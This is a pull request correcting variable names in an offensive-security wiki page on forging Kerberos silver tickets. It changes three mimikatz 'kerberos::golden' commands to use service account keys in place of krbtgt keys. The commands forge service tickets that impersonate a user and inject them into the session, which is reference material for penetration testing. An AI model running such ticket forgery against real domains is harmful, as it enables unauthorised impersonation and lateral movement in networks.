### PR TITLE
Fix: parameters variables names [Silver Ticket - Rubeus]

### DIFF
--- a/ad/movement/kerberos/forged-tickets/silver.md
+++ b/ad/movement/kerberos/forged-tickets/silver.md
@@ -37,13 +37,13 @@ On Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to ge
 
 ```bash
 # with an NT hash
-kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
+kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
 
 # with an AES 128 key
-kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
+kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
 
 # with an AES 256 key
-kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
+kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
 ```
 
 For both mimikatz and Rubeus, the `/ptt` flag is used to automatically [inject the ticket](../ptt.md#injecting-the-ticket).


### PR DESCRIPTION
For the Silver Ticket the key we need it's the service account's key not the krbtgt.